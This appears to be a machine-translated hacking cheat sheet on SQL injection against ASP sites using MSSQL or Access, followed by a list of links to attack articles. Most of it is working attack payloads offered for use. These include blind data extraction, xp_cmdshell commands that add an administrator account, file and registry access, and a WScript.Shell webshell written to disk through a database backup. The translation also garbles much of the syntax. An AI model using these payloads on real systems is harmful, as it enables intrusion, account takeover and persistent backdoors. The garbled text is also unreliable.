Topic: Summary ASP injection method 1. Judge whether there is an injection; and 1 = 1; and 1 = 22. Preliminary judgment is MSSQL; and user> 03. Judgment database system; and (select count (*) from Sysobjects> 0 mssql; and (select count (*) from msysobjects> 0 Access4. Injection parameters are character 'and [query conditions] and' '=' 5. The 'and [Query Conditions] and [Query Conditions] and '% 25' = '6. Guess the database; and (select count (*) from [Database Name])> 07. Guess field; and (select count "from database name)> 08. Guess field record length ; and (select top 1 len (field name) from database name)> 09. (1) ASCII value of the guess field; and (SELECT TOP 1 ASC (MID (Field Name, 1, 1)) from Database )> 0 (2) Guess field ASCII (MSSQL); and (Substring 1 Unicode (Substring (Field Name, 1, 1)) from Database Name)> 010. Test Permission Structure (MSSQL); And 1 = SELECT IS_SRVROLEMEMBER ( 'sysadmin')); -; and 1 = (SELECT IS_SRVROLEMEMBER ( 'serveradmin')); -; and 1 = (SELECT IS_SRVROLEMEMBER ( 'setupadmin')); -; and 1 = (SELECT IS_SRVROLEMEMBER ('securityadmin'); -; and 1 = (select is_srvrolemember ('diskdmin')); -; and 1 = (select is_srvrolemember ('bulkadmin')); -; and 1 = (select is_member) DB_OWNER '))); - 11. Adding MSSQL and system account; exec master.dbo.sp_addlogin username; -; exec master.dbo.sp_password null, username, password; -; exec master.dbo.sp_ad dsrvrolemember sysadmin username; -; exec master.dbo.xp_cmdshell 'net user username password / workstations: * / times: all / passwordchg: yes / passwordreq: yes / active: yes / add'; -; exec master.dbo. Xp_cmdshell 'net user username password / add'; -; exec master.dbo.xp_cmdshell 'net localgroup administrators username / add'; - 12. (1) Travel directory; Create Table DIRS (Paths varchar (100), ID int ); INSERT DIRS EXEC MASTER.DBO.XP_DIRTREE 'C: /'; and (SELECT TOP 1 Paths from Dirs)> 0; and (Select Top 1 Paths from Dirs where Paths Not in ('
Paths')>) (2) Traversing Catalog; Create Table Temp (ID NVARCHAR (255), Num2 NVARCHAR (255), Num3 NVARCHAR (255)); -; Insert Temp EXEC MASTER.DBO.XP_AVAILAMEDIA; - Get all current drives; INSERT INTO TEMP (ID) exec master.dbo.xp_subdirs 'c: /'; - Loose subdirectory list; Insert Into Temp (ID, Num1) Exec Master. DBO.XP_DIRTREE 'C: /'; - Get all subdirectory directory tree structure; Insert Into Temp (ID) exec master.dbo.xp_cmdshell 'type c: /web/index.asp'; - View file content 13.Mssql stored procedure XP_ReGenumValues Register the table Root key, subkey; EXEC XP_REGENUMVALUES 'HKEY_LOCAL_MACHINE', 'SOFTWARE / Microsoft / Windows / CurrentVersion / Run' Returns all key value XP_regread root keys, sub-keys, Key value name; EXEC XP_REGREAD 'HKEY_LOCAL_MACHINE', 'SOFTWARE / Microsoft / Windows / CurrentVersion', 'CommonFilesDir' Returns the value of the XP_REGWRITE root key, subkey, value name, value type, value value type, and two reg_sz represent characters type, REG_DWORD represents an integer; exec xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE / Microsoft / Windows / CurrentVersion', 'TestValueName', 'reg_sz', 'hello' into the registry xp_regdeletevalue root key, sub key value name exec xp_regdeletevalue ' HKEY_LOCAL_MACHINE ',' Software / Microsoft / Windows / CurrentVersion ',' TestValuename 'Deletes a value XP_REGD eletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE / Microsoft / Windows / CurrentVersion / Testkey' delete key, including all values 14.mssql backup of this key to create webshelluse modelcreate table cmd (str image); insert into cmd (str) values ( '< % DIM OSCRIPT%>); Backup Database Model To Disk = 'C: /L.ASP'; 15.msql Built-in Function; And (Select @@ Version)> 0 gets Windows version number; and user_name () = ' DBO 'Judging the connection user of the current system is SA; and (select user_name ()> 0 explosion current system connection user; and (select db_name ())> 0 Get the current connection database 16. Simple WebShelluse Modelcreate Table CMD (STR image); Insert INTO CMD (STR) VALUES ('<% = server.createObject ("
WScript.Shell "). Exec (" cmd.exe / c "& request (" c ")). stdout.readall%>); Backup Database Model to disk = 'g: /wwward/l.asp'; request At this time, like this: http://ip/l.asp? C = DIRSQL injection book - ASP injection vulnerability full contact (small bamboo) http://fox.163n.com/xyhack/hhh/list.asp?id = 222MSSQL cross-library query (smelly! Black night) http://fox.163n.com/xyhack/hhh/list.asp?id=66 squeezed MS SQL last drop blood http://fox.163n.com/ XYHACK / HHH / LIST.ASP? ID = 309sql statement reference and record set object detailed http://fox.163n.com/xyhack/hh/list.asp?id=124 About SQL Server stored procedure http: // fox .163n.com / xyhack / hHH / list.asp? ID = 314 Using MSSQL Backup to create WebShellhttp: //fox.163n.com/xyhack/hh/list.asp? Id = 219sql_injection advanced application http: //fox.163n .com / xyhack / hhh / list.asp? id = 221 cross-site SQL injection (Laokai) http://fox.163n.com/xyhack/hhh/list.asp?id=383 weird SQL Inject (Amanl) http://fox.163n.com/xyhack/hh/list.asp?id=320sql Server application advanced SQL injection (translation: Qingyan Zhiwo) http://fox.163n.com/ XYHACK / HHH / LIST.ASP? ID = 338 How to use SQL injection traversal (SINKA QQ: 20355) http://fox.163n.com/xyhack/hh/list.asp?id=316sql inJection Skills drill (translation People: Demonalex) http://fox.163n.com/xyhack/hh/list.asp?id=301sql database Some attacks http://fox.163n.com/xyha CK / HHH / LIST.ASP? ID = 152sql INJECTION Attack Technology (JSW) http://fox.163n.com/xyhack/hh /list.asp?id=208sql_INJECTION Advanced Application (APACHY) http: //fox.163n .com / xyhack / hhh / list.asp? id = 221sql injection uncomfortable method (Guilin veterans) http://fox.163n.com/xyhack/hh /list.asp?id=231backup a shellhttp: // fox .163n.com / xyhack / hhh / list.asp? Id = 274 talk about PHP mysql injection statement structure (black black · ≯super · hei) http://fox.163n.com/xyhack/hh /list.asp ? id = 386advanced SQL Injection with mysql (angel) http://fox.163n.com/xyhack/hh/list.asp?id=405l'Injection (my) SQL Via phphttp: //fox.163n.com/xyhack /hh/list.asp?id=420racle SQL language http://fox.163n.com/xyhack/hh /list.asp?id=
